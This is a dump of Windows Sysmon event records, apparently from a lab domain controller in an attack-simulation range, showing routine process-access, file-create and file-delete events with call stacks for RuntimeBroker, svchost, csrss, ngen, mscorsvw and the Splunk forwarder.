21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.072{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.072{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.072{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 23542300x800000000000000022333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.994{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D9DCDEBF7F67662C2F34D56873B8ADE,SHA256=FC9542079EC4157B97F001CF3E2C53FA326F04382865E339A75A7AD0C7D5F1C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.807{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0505-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.791{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0505-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.791{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0505-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.463{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0405-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.447{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0405-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.447{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0405-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:48.385{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\17f8-0\UIAutomationTypes.dll2021-06-23 21:06:48.385 10341000x800000000000000022325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.213{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.213{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.166{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0205-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.166{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0205-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.166{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0205-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:48.104{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd8-0\UIAutomationProvider.dll2021-06-23 21:06:48.104 23542300x800000000000000022318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.104{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFC452D09EE1FF8A7D135ED3D080AEF,SHA256=B0A619C2C0179ADCED21B758D501F13DE324D111D6CE39BD55AD0F61D5117BD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.041{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.025{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:48.025{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.994{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A267-60D3-0005-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 